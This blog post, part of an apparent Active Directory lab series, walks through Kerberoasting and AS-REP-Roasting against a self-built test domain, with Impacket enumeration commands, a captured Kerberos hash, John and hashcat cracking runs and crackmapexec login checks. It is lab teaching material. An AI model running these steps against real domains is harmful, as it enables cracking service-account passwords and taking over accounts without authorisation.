Total Pageviews

Sunday, September 19, 2021

Active Directory CORPORATIVE.domain.local Series[VIII] : Kerberoasting && AS-REP-Roasting attacks

Hi everyone!,

So far so good, In this post, i'm going to introduce yourself an other couple of Active directory attacks famous . Kerberoasting and AS-REP-Roasting.

This kind of attacks, are performance directly from the attacker side (kali linux machine) to Domian Controller of CORPORATIVE.DOMAIN.local environment:


1. KERBEROASTING ATTACK


The kerberoasting attack is performed directly to an existing account of the target domain that has the SPN configured and enable.

For more information about SPN (Service Principal Name), you could read the following link:

 https://docs.microsoft.com/es-es/archive/blogs/autz_auth_stuff/what-is-a-spn-and-why-should-you-care


1.1 Kerberoasting detection:


Using the GetUserSPNs.py tool, from the attacker machine side with a domain user and calid credentials, we can obtain the vulnerable users to kerberoasting attack.




1.2 Prerequisite:

Configure a vulnerable user to kerberoasting attack from on your domain controller:

- Create new user for this kind of attack:



- Set SPN to the target user:


1.3 Kerberoasting exploitation:


- Using the previous Impacket script is possible detect the new user with Service Principal Name, that it's going to be the target domain user for the attack exploitation:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName                                     Name         MemberOf                                                                                       PasswordLastSet             LastLogon  Delegation 
-------------------------------------------------------  -----------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  ----------
CORPORATIVE.DOMAIN.local/SVC_service.CORPORATIVE-DOMAIN  SVC_service  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 14:19:22.218200  <never>               

- TGS Hash request:


- Perform an offline dictionary attack:

 kali@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=KRB5TGS tgs_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Passw0rd1        (?)
1g 0:00:20:47 DONE (2021-09-19 15:24) 0.000801g/s 2502Kp/s 2502Kc/s 2502KC/s Passw0r0831..Passw0rd12312
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And finally validate login for a new user:

kali@kali:~$ crackmapexec smb 10.0.2.1/24 -u"SVC_service" -p"Passw0rd1"
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\SVC_service:Passw0rd1 (Pwn3d!)


2. AS-REP-ROASTING ATTACK

This attack is directly execute to Domain Controller too. In order to perform the attack, the attacker look for a users with not_pre authenticate property enabled for get a TGS kerberos Ticket.


2.1 AS-REP-Roasting detection:

The ASREPRoasting attack is performed directly to an existing account that is vulnerable to this kind of attacks, because it has enabled the NOT_PRE_AUTH attribute on domain account.


2.2 PREREQUISITE:

Configure a vulnerable user to ASREPRoasting attack from on your domain controller:

- Create new user for this kind of attack:


1.3 Kerberoasting exploitation:

- Looking for a vulnerable users: 

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py  CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Name     MemberOf                                                                                       PasswordLastSet             LastLogon  UAC      
-------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  --------
NP_user  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 15:13:32.016064  <never>    0x410200 

- Obtaining a kerberos preauth TGS ticket:


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6

- Performance an offline attack using hashcat :

sudo hashcat -m18200 '$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6' -a0 /usr/share/wordlists/rockyou.txt 

 The wordlist or mask that you are using is too small.

This means that hashcat cannot use the full parallel power of your device(s).

Unless you supply more work, your cracking speed will drop.

For tips on supplying more work, see: https://hashcat.net/faq/morework


Approaching final keyspace - workload adjusted.  


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6:Passw0rd1

                                                 

Session..........: hashcat

Status...........: Cracked

Hash.Name........: Kerberos 5, etype 23, AS-REP

Hash.Target......: $krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9a...6caed6



-And finally validate login for a new user:

kali@kali:~$ crackmapexec smb 10.0.2.17 -u"NP_user" -p"Passw0rd1"

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\NP_user:Passw0rd1 (Pwn3d!)



And this is all, for this couple Active directory attacks, I hope that you enjoy with my eigth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...